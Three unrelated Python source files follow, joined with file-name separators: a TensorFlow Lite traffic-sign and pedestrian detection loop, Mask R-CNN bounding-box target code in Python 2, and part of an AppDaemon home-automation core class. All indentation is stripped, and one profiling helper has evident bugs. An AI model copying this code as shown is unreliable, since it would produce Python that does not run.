# If tflite_runtime is installed, import interpreter from tflite_runtime, else import from regular tensorflow
# If using Coral Edge TPU, import the load_delegate library
pkg = importlib.util.find_spec('tflite_runtime')
if pkg:
from tflite_runtime.interpreter import Interpreter
#if use_TPU:
# from tflite_runtime.interpreter import load_delegate
else:
from tensorflow.lite.python.interpreter import Interpreter
#if use_TPU:
# from tensorflow.lite.python.interpreter import load_delegate
# If using Edge TPU, assign filename for Edge TPU model
#if use_TPU:
# If user has specified the name of the .tflite file, use that name, otherwise use default 'edgetpu.tflite'
# if (GRAPH_NAME == 'detect.tflite'):
# GRAPH_NAME = 'edgetpu.tflite'
# Get path to current working directory
CWD_PATH = os.getcwd()
# Path to .tflite file, which contains the model that is used for object detection
PATH_TO_CKPT = os.path.join(CWD_PATH,MODEL_NAME,GRAPH_NAME)
# Path to label map file
PATH_TO_LABELS = os.path.join(CWD_PATH,MODEL_NAME,LABELMAP_NAME)
# Load the label map
with open(PATH_TO_LABELS, 'r') as f:
labels = [line.strip() for line in f.readlines()]
# Load the Tensorflow Lite model.
# If using Edge TPU, use special load_delegate argument
#if use_TPU:
# interpreter = Interpreter(model_path=PATH_TO_CKPT,
# experimental_delegates=[load_delegate('libedgetpu.so.1.0')])
# print(PATH_TO_CKPT)
#else:
interpreter = Interpreter(model_path=PATH_TO_CKPT)
interpreter.allocate_tensors()
# Get model details
input_details = interpreter.get_input_details()
output_details = interpreter.get_output_details()
height = input_details[0]['shape'][1]
width = input_details[0]['shape'][2]
floating_model = (input_details[0]['dtype'] == np.float32)
input_mean = 128
input_std = 128
print(floating_model)
# Check output layer name to determine if this model was created with TF2 or TF1,
# because outputs are ordered differently for TF2 and TF1 models
outname = output_details[0]['name']
if ('StatefulPartitionedCall' in outname): # This is a TF2 model
boxes_idx, classes_idx, scores_idx = 1, 3, 0
else: # This is a TF1 model
boxes_idx, classes_idx, scores_idx = 0, 1, 2
# Initialize frame rate calculation
#frame_rate_calc = 1
#freq = cv2.getTickFrequency()
# Initialize video stream
#videostream = VideoStream(resolution=(imW,imH),framerate=5).start()
#time.sleep(1)
#for frame1 in camera.capture_continuous(rawCapture, format="bgr",use_video_port=True):
while True:
# Start timer (for calculating frame rate)
#t1 = cv2.getTickCount()
# Grab frame from video stream
#frame1 = videostream.read()
YMAX = 0
for sent_frames in inP:
frame_in = sent_frames.recv()
if frame_in is not None:
frame_rgb = frame_in[0]
# Acquire frame and resize to expected shape [1xHxWx3]
#frame = frame1.copy()
#frame_rgb = cv2.cvtColor(frame1, cv2.COLOR_BGR2RGB)
frame_resized = cv2.resize(frame_rgb, (width, height))
input_data = np.expand_dims(frame_resized, axis=0)
#input_data = np.expand_dims(frame_rgb, axis=0)
# Normalize pixel values if using a floating model (i.e. if model is non-quantized)
if floating_model:
input_data = (np.float32(input_data) - input_mean) / input_std
# Perform the actual detection by running the model with the image as input
interpreter.set_tensor(input_details[0]['index'],input_data)
interpreter.invoke()
# Retrieve detection results
boxes = interpreter.get_tensor(output_details[boxes_idx]['index'])[0] # Bounding box coordinates of detected objects
classes = interpreter.get_tensor(output_details[classes_idx]['index'])[0] # Class index of detected objects
scores = interpreter.get_tensor(output_details[scores_idx]['index'])[0] # Confidence of detected objects
detected_objects = []
# Loop over all detections and draw detection box if confidence is above minimum threshold
for i in range(len(scores)):
flag = False
ymin = int(max(1,(boxes[i][0] * imH)))
ymax = int(min(imH,(boxes[i][2] * imH)))
YMAX = abs((ymax - ymin))
if ('ped' in labels[int(classes[i])] and YMAX > 40 and scores[i] >= 0.75):
flag = True
elif 'priority' in labels[int(classes[i])] and scores[i] >= 0.25 and YMAX > 30:
flag = True
elif 'parking' in labels[int(classes[i])] and scores[i] >= 0.20 and YMAX > 30:
flag = True
elif 'cross' in labels[int(classes[i])] and YMAX > 30 and scores[i] >= 0.55:
flag = True
elif 'stop' in labels[int(classes[i])] and scores[i] >= 0.25:
flag = True
#if ((scores[i] > min_conf_threshold) and (scores[i] <= 1.0)):
if flag:
# Get bounding box coordinates and draw box
# Interpreter can return coordinates that are outside of image dimensions, need to force them to be within image using max() and min()
ymin = int(max(1,(boxes[i][0] * imH)))
xmin = int(max(1,(boxes[i][1] * imW)))
ymax = int(min(imH,(boxes[i][2] * imH)))
xmax = int(min(imW,(boxes[i][3] * imW)))
#YMAX = boxes[i][2] * imH
YMAX = abs((ymax - ymin))
cv2.rectangle(frame_rgb, (xmin,ymin), (xmax,ymax), (10, 255, 0), 2)
# Draw label
object_name = labels[int(classes[i])] # Look up object name from "labels" array using class index
label = '%s: %d%%' % (object_name, int(scores[i]*100)) # Example: 'person: 72%'
labelSize, baseLine = cv2.getTextSize(label, cv2.FONT_HERSHEY_SIMPLEX, 0.5, 1) # Get font size
label_ymin = max(ymin, labelSize[1] + 10) # Make sure not to draw label too close to top of window
cv2.rectangle(frame_rgb, (xmin, label_ymin-labelSize[1]-10), (xmin+labelSize[0], label_ymin+baseLine-10), (255, 255, 255), cv2.FILLED) # Draw white box to put label text in
cv2.putText(frame_rgb, label, (xmin, label_ymin-7), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 0), 1) # Draw label text
'''
if ('ped' in label and YMAX > 40 and scores[i] >= 0.75):
detected_objects.append(label)
elif 'priority' in label and YMAX > 35:
detected_objects.append(label)
elif 'parking' in label and YMAX > 35:
detected_objects.append(label)
elif 'cross' in label and YMAX > 30 and scores[i] >= 0.55:
detected_objects.append(label)
elif 'stop' in label and scores[i] >= 0.45:
detected_objects.append(label)
'''
detected_objects.append(label)
for outPipe in outP:
outPipe.send([frame_rgb, detected_objects, YMAX])
|
bbox_regression.py
|
"""
This file has functions about generating bounding box regression targets
"""
from ..pycocotools.mask import encode
import numpy as np
from bbox_transform import bbox_overlaps, nonlinear_transform
from rcnn.config import config
import math
import cv2
import PIL.Image as Image
import threading
import Queue
bbox_transform = nonlinear_transform
def compute_bbox_regression_targets(rois, overlaps, labels):
"""
given rois, overlaps, gt labels, compute bounding box regression targets
:param rois: roidb[i]['boxes'] k * 4
:param overlaps: roidb[i]['max_overlaps'] k * 1
:param labels: roidb[i]['max_classes'] k * 1
:return: targets[i][class, dx, dy, dw, dh] k * 5
"""
# Ensure ROIs are floats
rois = rois.astype(np.float, copy=False)
# Sanity check
if len(rois) != len(overlaps):
print 'bbox regression: this should not happen'
# Indices of ground-truth ROIs
gt_inds = np.where(overlaps == 1)[0]
if len(gt_inds) == 0:
print 'something wrong : zero ground truth rois'
# Indices of examples for which we try to make predictions
ex_inds = np.where(overlaps >= config.TRAIN.BBOX_REGRESSION_THRESH)[0]
# Get IoU overlap between each ex ROI and gt ROI
ex_gt_overlaps = bbox_overlaps(rois[ex_inds, :], rois[gt_inds, :])
# Find which gt ROI each ex ROI has max overlap with:
# this will be the ex ROI's gt target
gt_assignment = ex_gt_overlaps.argmax(axis=1)
gt_rois = rois[gt_inds[gt_assignment], :]
ex_rois = rois[ex_inds, :]
targets = np.zeros((rois.shape[0], 5), dtype=np.float32)
targets[ex_inds, 0] = labels[ex_inds]
targets[ex_inds, 1:] = bbox_transform(ex_rois, gt_rois)
return targets
def add_bbox_regression_targets(roidb):
"""
given roidb, add ['bbox_targets'] and normalize bounding box regression targets
:param roidb: roidb to be processed. must have gone through imdb.prepare_roidb
:return: means, std variances of targets
"""
print 'add bounding box regression targets'
assert len(roidb) > 0
assert 'max_classes' in roidb[0]
num_images = len(roidb)
num_classes = roidb[0]['gt_overlaps'].shape[1]
for im_i in range(num_images):
rois = roidb[im_i]['boxes']
max_overlaps = roidb[im_i]['max_overlaps']
max_classes = roidb[im_i]['max_classes']
roidb[im_i]['bbox_targets'] = compute_bbox_regression_targets(rois, max_overlaps, max_classes)
if config.TRAIN.BBOX_NORMALIZATION_PRECOMPUTED:
# use fixed / precomputed means and stds instead of empirical values
means = np.tile(np.array(config.TRAIN.BBOX_MEANS), (num_classes, 1))
stds = np.tile(np.array(config.TRAIN.BBOX_STDS), (num_classes, 1))
else:
# compute mean, std values
class_counts = np.zeros((num_classes, 1)) + 1e-14
sums = np.zeros((num_classes, 4))
squared_sums = np.zeros((num_classes, 4))
for im_i in range(num_images):
targets = roidb[im_i]['bbox_targets']
for cls in range(1, num_classes):
cls_indexes = np.where(targets[:, 0] == cls)[0]
if cls_indexes.size > 0:
class_counts[cls] += cls_indexes.size
sums[cls, :] += targets[cls_indexes, 1:].sum(axis=0)
squared_sums[cls, :] += (targets[cls_indexes, 1:] ** 2).sum(axis=0)
means = sums / class_counts
# var(x) = E(x^2) - E(x)^2
stds = np.sqrt(squared_sums / class_counts - means ** 2)
# normalized targets
for im_i in range(num_images):
targets = roidb[im_i]['bbox_targets']
for cls in range(1, num_classes):
cls_indexes = np.where(targets[:, 0] == cls)[0]
roidb[im_i]['bbox_targets'][cls_indexes, 1:] -= means[cls, :]
roidb[im_i]['bbox_targets'][cls_indexes, 1:] /= stds[cls, :]
return means.ravel(), stds.ravel()
def compute_mask_and_label(ex_rois, ex_labels, seg, flipped):
# assert os.path.exists(seg_gt), 'Path does not exist: {}'.format(seg_gt)
# im = Image.open(seg_gt)
# pixel = list(im.getdata())
# pixel = np.array(pixel).reshape([im.size[1], im.size[0]])
im = Image.open(seg)
pixel = list(im.getdata())
ins_seg = np.array(pixel).reshape([im.size[1], im.size[0]])
if flipped:
ins_seg = ins_seg[:, ::-1]
rois = ex_rois
n_rois = ex_rois.shape[0]
label = ex_labels
class_id = config.CLASS_ID
mask_target = np.zeros((n_rois, 28, 28), dtype=np.int8)
mask_label = np.zeros((n_rois), dtype=np.int8)
for n in range(n_rois):
target = ins_seg[int(rois[n, 1]): int(rois[n, 3]), int(rois[n, 0]): int(rois[n, 2])]
ids = np.unique(target)
ins_id = 0
max_count = 0
for id in ids:
if math.floor(id / 1000) == class_id[int(label[int(n)])]:
px = np.where(ins_seg == int(id))
x_min = np.min(px[1])
y_min = np.min(px[0])
x_max = np.max(px[1])
y_max = np.max(px[0])
x1 = max(rois[n, 0], x_min)
y1 = max(rois[n, 1], y_min)
x2 = min(rois[n, 2], x_max)
y2 = min(rois[n, 3], y_max)
iou = (x2 - x1) * (y2 - y1)
iou = iou / ((rois[n, 2] - rois[n, 0]) * (rois[n, 3] - rois[n, 1])
+ (x_max - x_min) * (y_max - y_min) - iou)
if iou > max_count:
ins_id = id
max_count = iou
if max_count == 0:
continue
# print max_count
mask = np.zeros(target.shape)
idx = np.where(target == ins_id)
mask[idx] = 1
mask = cv2.resize(mask, (28, 28), interpolation=cv2.INTER_NEAREST)
mask_target[n] = mask
mask_label[n] = label[int(n)]
return mask_target, mask_label
def compute_bbox_mask_targets_and_label(rois, overlaps, labels, seg, flipped):
"""
given rois, overlaps, gt labels, seg, compute bounding box mask targets
:param rois: roidb[i]['boxes'] k * 4
:param overlaps: roidb[i]['max_overlaps'] k * 1
:param labels: roidb[i]['max_classes'] k * 1
:return: targets[i][class, dx, dy, dw, dh] k * 5
"""
# Ensure ROIs are floats
rois = rois.astype(np.float, copy=False)
# Sanity check
if len(rois) != len(overlaps):
print 'bbox regression: this should not happen'
# Indices of ground-truth ROIs
gt_inds = np.where(overlaps == 1)[0]
if len(gt_inds) == 0:
print 'something wrong : zero ground truth rois'
# Indices of examples for which we try to make predictions
ex_inds = np.where(overlaps >= config.TRAIN.BBOX_REGRESSION_THRESH)[0]
# Get IoU overlap between each ex ROI and gt ROI
ex_gt_overlaps = bbox_overlaps(rois[ex_inds, :], rois[gt_inds, :])
# Find which gt ROI each ex ROI has max overlap with:
# this will be the ex ROI's gt target
gt_assignment = ex_gt_overlaps.argmax(axis=1)
gt_rois = rois[gt_inds[gt_assignment], :]
ex_rois = rois[ex_inds, :]
mask_targets, mask_label = compute_mask_and_label(ex_rois, labels[ex_inds], seg, flipped)
return mask_targets, mask_label, ex_inds
def add_mask_targets(roidb):
"""
given roidb, add ['bbox_targets'] and normalize bounding box regression targets
:param roidb: roidb to be processed. must have gone through imdb.prepare_roidb
:return: means, std variances of targets
"""
print 'add bounding box mask targets'
assert len(roidb) > 0
assert 'max_classes' in roidb[0]
num_images = len(roidb)
# Multi threads processing
im_quene = Queue.Queue(maxsize=0)
for im_i in range(num_images):
im_quene.put(im_i)
def process():
while not im_quene.empty():
im_i = im_quene.get()
print "-----process img {}".format(im_i)
rois = roidb[im_i]['boxes']
max_overlaps = roidb[im_i]['max_overlaps']
max_classes = roidb[im_i]['max_classes']
ins_seg = roidb[im_i]['ins_seg']
flipped = roidb[im_i]['flipped']
roidb[im_i]['mask_targets'], roidb[im_i]['mask_labels'], roidb[im_i]['mask_inds'] = \
compute_bbox_mask_targets_and_label(rois, max_overlaps, max_classes, ins_seg, flipped)
threads = [threading.Thread(target=process, args=()) for i in xrange(10)]
for t in threads: t.start()
for t in threads: t.join()
# Single thread
# for im_i in range(num_images):
# print "-----processing img {}".format(im_i)
# rois = roidb[im_i]['boxes']
# max_overlaps = roidb[im_i]['max_overlaps']
# max_classes = roidb[im_i]['max_classes']
# ins_seg = roidb[im_i]['ins_seg']
# # roidb[im_i]['mask_targets'] = compute_bbox_mask_targets(rois, max_overlaps, max_classes, ins_seg)
# roidb[im_i]['mask_targets'], roidb[im_i]['mask_labels'], roidb[im_i]['mask_inds'] = \
# compute_bbox_mask_targets_and_label(rois, max_overlaps, max_classes, ins_seg)
def expand_bbox_regression_targets(bbox_targets_data, num_classes):
"""
expand from 5 to 4 * num_classes; only the right class has non-zero bbox regression targets
:param bbox_targets_data: [k * 5]
:param num_classes: number of classes
:return: bbox target processed [k * 4 num_classes]
bbox_weights ! only foreground boxes have bbox regression computation!
"""
classes = bbox_targets_data[:, 0]
bbox_targets = np.zeros((classes.size, 4 * num_classes), dtype=np.float32)
bbox_weights = np.zeros(bbox_targets.shape, dtype=np.float32)
indexes = np.where(classes > 0)[0]
for index in indexes:
cls = classes[index]
start = int(4 * cls)
end = start + 4
bbox_targets[index, start:end] = bbox_targets_data[index, 1:]
bbox_weights[index, start:end] = config.TRAIN.BBOX_WEIGHTS
return bbox_targets, bbox_weights
|
appdaemon.py
|
import sys
import importlib
import traceback
import os
import os.path
from queue import Queue
import datetime
import uuid
import astral
import pytz
import math
import asyncio
import yaml
import concurrent.futures
import threading
import random
import re
from copy import deepcopy, copy
import subprocess
import functools
import time
import cProfile
import io
import pstats
import appdaemon.utils as utils
class AppDaemon:
required_meta = ["latitude", "longitude", "elevation", "time_zone"]
def __init__(self, logger, error, diag, loop, **kwargs):
self.logger = logger
self.error = error
self.diagnostic = diag
self.config = kwargs
self.config["ad_version"] = utils.__version__
self.q = Queue(maxsize=0)
self.check_app_updates_profile = ""
self.was_dst = False
self.last_state = None
self.last_plugin_state = {}
self.monitored_files = {}
self.filter_files = {}
self.modules = {}
self.appq = None
self.executor = None
self.loop = None
self.srv = None
self.appd = None
self.stopping = False
self.dashboard = None
self.now = datetime.datetime.now().timestamp()
self.objects = {}
self.objects_lock = threading.RLock()
self.schedule = {}
self.schedule_lock = threading.RLock()
self.callbacks = {}
self.callbacks_lock = threading.RLock()
self.thread_info = {}
self.thread_info_lock = threading.RLock()
self.thread_info["threads"] = {}
self.thread_info["current_busy"] = 0
self.thread_info["max_busy"] = 0
self.thread_info["max_busy_time"] = 0
self.thread_info["last_action_time"] = 0
self.state = {}
self.state["default"] = {}
self.state_lock = threading.RLock()
self.endpoints = {}
self.endpoints_lock = threading.RLock()
self.plugin_meta = {}
self.plugin_objs = {}
# No locking yet
self.global_vars = {}
self.sun = {}
self.config_file_modified = 0
self.tz = None
self.realtime = True
self.version = 0
self.app_config_file_modified = 0
self.app_config = {}
self.app_config_file = None
self._process_arg("app_config_file", kwargs)
self.plugin_params = kwargs["plugins"]
# User Supplied/Defaults
self.threads = 10
self._process_arg("threads", kwargs, int=True)
self.app_dir = None
self._process_arg("app_dir", kwargs)
self.starttime = None
self._process_arg("starttime", kwargs)
self._process_arg("now", kwargs)
self.logfile = None
self._process_arg("logfile", kwargs)
if self.logfile is None:
self.logfile = "STDOUT"
self.latitude = None
self._process_arg("latitude", kwargs)
self.longitude = None
self._process_arg("longitude", kwargs)
self.elevation = None
self._process_arg("elevation", kwargs)
self.time_zone = None
self._process_arg("time_zone", kwargs)
self.errfile = None
self._process_arg("error_file", kwargs)
if self.errfile is None:
self.errfile = "STDERR"
self.config_file = None
self._process_arg("config_file", kwargs)
self.config_dir = None
self._process_arg("config_dir", kwargs)
self.plugins = {}
self._process_arg("plugins", kwargs)
self.tick = 1
self._process_arg("tick", kwargs, int=True)
self.max_clock_skew = 1
self._process_arg("max_clock_skew", kwargs, int=True)
self.threadpool_workers = 10
self._process_arg("threadpool_workers", kwargs, int=True)
self.endtime = None
if "endtime" in kwargs:
self.endtime = datetime.datetime.strptime(kwargs["endtime"], "%Y-%m-%d %H:%M:%S")
self.interval = 1
self._process_arg("interval", kwargs, int=True)
self.loglevel = "INFO"
self._process_arg("loglevel", kwargs)
self.api_port = None
self._process_arg("api_port", kwargs)
self.utility_delay = 1
self._process_arg("utility_delay", kwargs, int=True)
self.max_utility_skew = self.utility_delay * 0.9
self._process_arg("max_utility_skew", kwargs, float=True)
self.check_app_updates_profile = False
self._process_arg("check_app_updates_profile", kwargs)
self.production_mode = False
self._process_arg("production_mode", kwargs)
self.invalid_yaml_warnings = True
self._process_arg("invalid_yaml_warnings", kwargs)
self.missing_app_warnings = True
self._process_arg("missing_app_warnings", kwargs)
self.log_thread_actions = False
self._process_arg("log_thread_actions", kwargs)
self.exclude_dirs = ["__pycache__"]
if "exclude_dirs" in kwargs:
self.exclude_dirs += kwargs["exclude_dirs"]
self.stop_function = None
self.stop_function = None
self._process_arg("stop_function", kwargs)
if self.tick != 1 or self.interval != 1 or self.starttime is not None:
self.realtime = False
if not kwargs.get("cert_verify", True):
self.certpath = False
if kwargs.get("disable_apps") is True:
self.apps = False
self.log("INFO", "Apps are disabled")
else:
self.apps = True
self.log("INFO", "Starting Apps")
# Initialize config file tracking
self.app_config_file_modified = 0
self.app_config_files = {}
self.module_dirs = []
if self.apps is True:
if self.app_dir is None:
if self.config_dir is None:
self.app_dir = utils.find_path("apps")
self.config_dir = os.path.dirname(self.app_dir)
else:
self.app_dir = os.path.join(self.config_dir, "apps")
utils.check_path("config_dir", logger, self.config_dir, permissions="rwx")
utils.check_path("appdir", logger, self.app_dir)
#if os.path.isdir(self.app_dir) is False:
# self.log("ERROR", "Invalid value for app_dir: {}".format(self.app_dir))
# return
#
# Initial Setup
#
self.appq = asyncio.Queue(maxsize=0)
self.log("DEBUG", "Creating worker threads ...")
# Create Worker Threads
for i in range(self.threads):
t = threading.Thread(target=self.worker)
t.daemon = True
t.setName("thread-{}".format(i+1))
with self.thread_info_lock:
self.thread_info["threads"][t.getName()] = {"callback": "idle", "time_called": 0, "thread": t}
t.start()
if self.apps is True:
self.process_filters()
self.log("DEBUG", "Done")
self.loop = loop
self.stopping = False
self.log("DEBUG", "Entering run()")
self.executor = concurrent.futures.ThreadPoolExecutor(max_workers=self.threadpool_workers)
# Load Plugins
plugins = []
if os.path.isdir(os.path.join(self.config_dir, "custom_plugins")):
plugins = [f.path for f in os.scandir(os.path.join(self.config_dir, "custom_plugins")) if f.is_dir(follow_symlinks=True)]
for plugin in plugins:
sys.path.insert(0, plugin)
if self.plugins is not None:
for name in self.plugins:
basename = self.plugins[name]["type"]
type = self.plugins[name]["type"]
module_name = "{}plugin".format(basename)
class_name = "{}Plugin".format(basename.capitalize())
full_module_name = None
for plugin in plugins:
if os.path.basename(plugin) == type:
full_module_name = "{}".format(module_name)
self.log("INFO",
"Loading Custom Plugin {} using class {} from module {}".format(name, class_name,
module_name))
break
if full_module_name == None:
#
# Not a custom plugin, assume it's a built in
#
basepath = "appdaemon.plugins"
full_module_name = "{}.{}.{}".format(basepath, basename, module_name)
self.log("INFO",
"Loading Plugin {} using class {} from module {}".format(name, class_name,
module_name))
try:
mod = __import__(full_module_name, globals(), locals(), [module_name], 0)
app_class = getattr(mod, class_name)
plugin = app_class(self, name, self.logger, self.err, self.loglevel, self.plugins[name])
namespace = plugin.get_namespace()
if namespace in self.plugin_objs:
raise ValueError("Duplicate namespace: {}".format(namespace))
self.plugin_objs[namespace] = plugin
loop.create_task(plugin.get_updates())
except:
self.log("WARNING", "error loading plugin: {} - ignoring".format(name))
self.log("WARNING", '-' * 60)
self.log("WARNING", traceback.format_exc())
self.log("WARNING", '-' * 60)
# Create utility loop
self.log("DEBUG", "Starting utility loop")
loop.create_task(self.utility())
# Create AppState Loop
if self.apps:
loop.create_task(self.appstate_loop())
def _process_arg(self, arg, args, **kwargs):
if args:
if arg in args:
value = args[arg]
if "int" in kwargs and kwargs["int"] is True:
try:
value = int(value)
setattr(self, arg, value)
except ValueError:
self.log("WARNING", "Invalid value for {}: {}, using default({})".format(arg, value, getattr(self, arg)))
if "float" in kwargs and kwargs["float"] is True:
try:
value = float(value)
setattr(self, arg, value)
except ValueError:
self.log("WARNING", "Invalid value for {}: {}, using default({})".format(arg, value, getattr(self, arg)))
else:
setattr(self, arg, value)
def _timeit(func):
@functools.wraps(func)
def newfunc(self, *args, **kwargs):
start_time = time.time()
result = func(self, *args, **kwargs)
elapsed_time = time.time() - start_time
self.log("INFO", 'function [{}] finished in {} ms'.format(
func.__name__, int(elapsed_time * 1000)))
return result
return newfunc
def _profile_this(fn):
def profiled_fn(self, *args, **kwargs):
self.pr = cProfile.Profile()
self.pr.enable()
result = fn(self, *args, **kwargs)
self.pr.disable()
s = io.StringIO()
sortby = 'cumulative'
ps = pstats.Stats(pr, stream=s).sort_stats(sortby)
ps.print_stats()
self.profile = fn + s.getvalue()
return result
return profiled_fn
def stop(self):
self.stopping = True
# if ws is not None:
# ws.close()
if self.apps:
self.appq.put_nowait({"namespace": "global", "event_type": "ha_stop", "data": None})
for plugin in self.plugin_objs:
self.plugin_objs[plugin].stop()
#
# Diagnostics
#
def dump_callbacks(self):
if self.callbacks == {}:
self.diag("INFO", "No callbacks")
else:
self.diag("INFO", "--------------------------------------------------")
self.diag("INFO", "Callbacks")
self.diag("INFO", "--------------------------------------------------")
for name in self.callbacks.keys():
self.diag("INFO", "{}:".format(name))
for uuid_ in self.callbacks[name]:
self.diag( "INFO", " {} = {}".format(uuid_, self.callbacks[name][uuid_]))
self.diag("INFO", "--------------------------------------------------")
def dump_objects(self):
self.diag("INFO", "--------------------------------------------------")
self.diag("INFO", "Objects")
self.diag("INFO", "--------------------------------------------------")
with self.objects_lock:
for object_ in self.objects.keys():
self.diag("INFO", "{}: {}".format(object_, self.objects[object_]))
self.diag("INFO", "--------------------------------------------------")
def dump_queue(self):
self.diag("INFO", "--------------------------------------------------")
self.diag("INFO", "Current Queue Size is {}".format(self.q.qsize()))
self.diag("INFO", "--------------------------------------------------")
@staticmethod
def atoi(text):
return int(text) if text.isdigit() else text
def natural_keys(self, text):
return [self.atoi(c) for c in re.split('(\d+)', text)]
def get_thread_info(self):
info = {}
# Make a copy without the thread objects
with self.thread_info_lock:
info["max_busy_time"] = copy(self.thread_info["max_busy_time"])
info["last_action_time"] = copy(self.thread_info["last_action_time"])
info["current_busy"] = copy(self.thread_info["current_busy"])
info["max_busy"] = copy(self.thread_info["max_busy"])
info["threads"] = {}
for thread in self.thread_info["threads"]:
if thread not in info["threads"]:
info["threads"][thread] = {}
info["threads"][thread]["time_called"] = self.thread_info["threads"][thread]["time_called"]
info["threads"][thread]["callback"] = self.thread_info["threads"][thread]["callback"]
info["threads"][thread]["is_alive"] = self.thread_info["threads"][thread]["thread"].is_alive()
return info
def dump_threads(self):
self.diag("INFO", "--------------------------------------------------")
self.diag("INFO", "Threads")
self.diag("INFO", "--------------------------------------------------")
with self.thread_info_lock:
max_ts = datetime.datetime.fromtimestamp(self.thread_info["max_busy_time"])
last_ts = datetime.datetime.fromtimestamp(self.thread_info["last_action_time"])
self.diag("INFO", "Currently busy threads: {}".format(self.thread_info["current_busy"]))
self.diag("INFO", "Most used threads: {} at {}".format(self.thread_info["max_busy"], max_ts))
self.diag("INFO", "Last activity: {}".format(last_ts))
self.diag("INFO", "--------------------------------------------------")
for thread in sorted(self.thread_info["threads"], key=self.natural_keys):
ts = datetime.datetime.fromtimestamp(self.thread_info["threads"][thread]["time_called"])
self.diag("INFO",
"{} - current callback: {} since {}, alive: {}".format(
thread,
self.thread_info["threads"][thread]["callback"],
ts,
self.thread_info["threads"][thread]["thread"].is_alive()
))
self.diag("INFO", "--------------------------------------------------")
def get_callback_entries(self):
callbacks = {}
for name in self.callbacks.keys():
callbacks[name] = {}
for uuid_ in self.callbacks[name]:
callbacks[name][uuid_] = {}
if "entity" in callbacks[name][uuid_]:
callbacks[name][uuid_]["entity"] = self.callbacks[name][uuid_]["entity"]
else:
callbacks[name][uuid_]["entity"] = None
callbacks[name][uuid_]["type"] = self.callbacks[name][uuid_]["type"]
callbacks[name][uuid_]["kwargs"] = self.callbacks[name][uuid_]["kwargs"]
callbacks[name][uuid_]["function"] = self.callbacks[name][uuid_]["function"]
callbacks[name][uuid_]["name"] = self.callbacks[name][uuid_]["name"]
return callbacks
#
# Constraints
#
def check_constraint(self, key, value, app):
unconstrained = True
if key in app.list_constraints():
method = getattr(app, key)
unconstrained = method(value)
return unconstrained
def check_time_constraint(self, args, name):
unconstrained = True
if "constrain_start_time" in args or "constrain_end_time" in args:
if "constrain_start_time" not in args:
start_time = "00:00:00"
else:
start_time = args["constrain_start_time"]
if "constrain_end_time" not in args:
end_time = "23:59:59"
else:
end_time = args["constrain_end_time"]
if not self.now_is_between(start_time, end_time, name):
unconstrained = False
return unconstrained
#
# Thread Management
#
def dispatch_worker(self, name, args):
with self.objects_lock:
unconstrained = True
#
# Argument Constraints
#
for arg in self.app_config[name].keys():
constrained = self.check_constraint(arg, self.app_config[name][arg], self.objects[name]["object"])
if not constrained:
unconstrained = False
if not self.check_time_constraint(self.app_config[name], name):
unconstrained = False
#
# Callback level constraints
#
if "kwargs" in args:
for arg in args["kwargs"].keys():
constrained = self.check_constraint(arg, args["kwargs"][arg], self.objects[name]["object"])
if not constrained:
unconstrained = False
if not self.check_time_constraint(args["kwargs"], name):
unconstrained = False
if unconstrained:
self.q.put_nowait(args)
def update_thread_info(self, thread_id, callback, type = None):
if self.log_thread_actions:
if callback == "idle":
self.diag("INFO",
"{} done".format(thread_id, type, callback))
else:
self.diag("INFO",
"{} calling {} callback {}".format(thread_id, type, callback))
with self.thread_info_lock:
ts = self.now
self.thread_info["threads"][thread_id]["callback"] = callback
self.thread_info["threads"][thread_id]["time_called"] = ts
if callback == "idle":
self.thread_info["current_busy"] -= 1
else:
self.thread_info["current_busy"] += 1
if self.thread_info["current_busy"] > self.thread_info["max_busy"]:
self.thread_info["max_busy"] = self.thread_info["current_busy"]
self.thread_info["max_busy_time"] = ts
self.thread_info["last_action_time"] = ts
# noinspection PyBroadException
def worker(self):
while True:
thread_id = threading.current_thread().name
args = self.q.get()
_type = args["type"]
funcref = args["function"]
_id = args["id"]
name = args["name"]
callback = "{}() in {}".format(funcref.__name__, name)
app = None
with self.objects_lock:
if name in self.objects and self.objects[name]["id"] == _id:
app = self.objects[name]["object"]
if app is not None:
try:
if _type == "timer":
self.update_thread_info(thread_id, callback, _type)
funcref(self.sanitize_timer_kwargs(app, args["kwargs"]))
self.update_thread_info(thread_id, "idle")
elif _type == "attr":
entity = args["entity"]
attr = args["attribute"]
old_state = args["old_state"]
new_state = args["new_state"]
self.update_thread_info(thread_id, callback, _type)
funcref(entity, attr, old_state, new_state,
self.sanitize_state_kwargs(app, args["kwargs"]))
self.update_thread_info(thread_id, "idle")
elif _type == "event":
data = args["data"]
self.update_thread_info(thread_id, callback, _type)
funcref(args["event"], data, args["kwargs"])
self.update_thread_info(thread_id, "idle")
except:
self.err("WARNING", '-' * 60)
self.err("WARNING", "Unexpected error in worker for App {}:".format(name))
self.err("WARNING", "Worker Ags: {}".format(args))
self.err("WARNING", '-' * 60)
self.err("WARNING", traceback.format_exc())
self.err("WARNING", '-' * 60)
if self.errfile != "STDERR" and self.logfile != "STDOUT":
self.log("WARNING", "Logged an error to {}".format(self.errfile))
else:
self.log("WARNING", "Found stale callback for {} - discarding".format(name))
self.q.task_done()
#
# State
#
def entity_exists(self, namespace, entity):
with self.state_lock:
if namespace in self.state and entity in self.state[namespace]:
return True
else:
return False
def add_state_callback(self, name, namespace, entity, cb, kwargs):
with self.callbacks_lock:
if name not in self.callbacks:
self.callbacks[name] = {}
handle = uuid.uuid4()
with self.objects_lock:
self.callbacks[name][handle] = {
"name": name,
"id": self.objects[name]["id"],
"type": "state",
"function": cb,
"entity": entity,
"namespace": namespace,
"kwargs": kwargs
}
#
# In the case of a quick_start parameter,
# start the clock immediately if the device is already in the new state
#
if "immediate" in kwargs and kwargs["immediate"] is True:
if entity is not None and "new" in kwargs and "duration" in kwargs:
with self.state_lock:
if self.state[namespace][entity]["state"] == kwargs["new"]:
exec_time = self.get_now_ts() + int(kwargs["duration"])
kwargs["_duration"] = self.insert_schedule(
name, exec_time, cb, False, None,
entity=entity,
attribute=None,
old_state=None,
new_state=kwargs["new"], **kwargs
)
return handle
def cancel_state_callback(self, handle, name):
with self.callbacks_lock:
if name not in self.callbacks or handle not in self.callbacks[name]:
self.log("WARNING", "Invalid callback in cancel_state_callback() from app {}".format(name))
if name in self.callbacks and handle in self.callbacks[name]:
del self.callbacks[name][handle]
if name in self.callbacks and self.callbacks[name] == {}:
del self.callbacks[name]
def info_state_callback(self, handle, name):
with self.callbacks_lock:
if name in self.callbacks and handle in self.callbacks[name]:
callback = self.callbacks[name][handle]
with self.objects_lock:
return (
callback["namespace"],
callback["entity"],
callback["kwargs"].get("attribute", None),
self.sanitize_state_kwargs(self.objects[name]["object"], callback["kwargs"])
)
else:
